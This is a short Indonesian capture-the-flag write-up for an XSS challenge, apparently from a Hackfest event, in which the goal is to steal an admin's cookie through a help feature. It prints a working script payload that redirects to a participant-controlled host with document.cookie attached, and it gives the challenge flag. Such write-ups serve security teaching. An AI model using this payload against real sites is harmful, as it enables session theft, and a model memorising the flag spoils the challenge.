# Bagi Kue Min 1

# Deskripsi

    lagi lagi tim ccug membuat sebuah fitur Bantuan untuk para peserta yang butuh pertolongan tapi kalau mau dapet flag? curi sesuatu dari admin h3h3h3

# Solusi

Para peserta diminta untuk membuat sebuah payload script javascript berbahaya yang isinya untuk mencuri cookie admin yang berisi flag, peserta bisa mendapatkan payload dari google atau merancang sendiri

    <script>window.location.href='http://server_peserta.com/?bebas='+document.cookie;</script>

flag : hackfest{yang_tau_flag_ini_hanya_kamu_yang_berhasil_mengeksploitasi_kerentanan_xss_dan_tuhan_dan_tentunya_saya_selaku_author}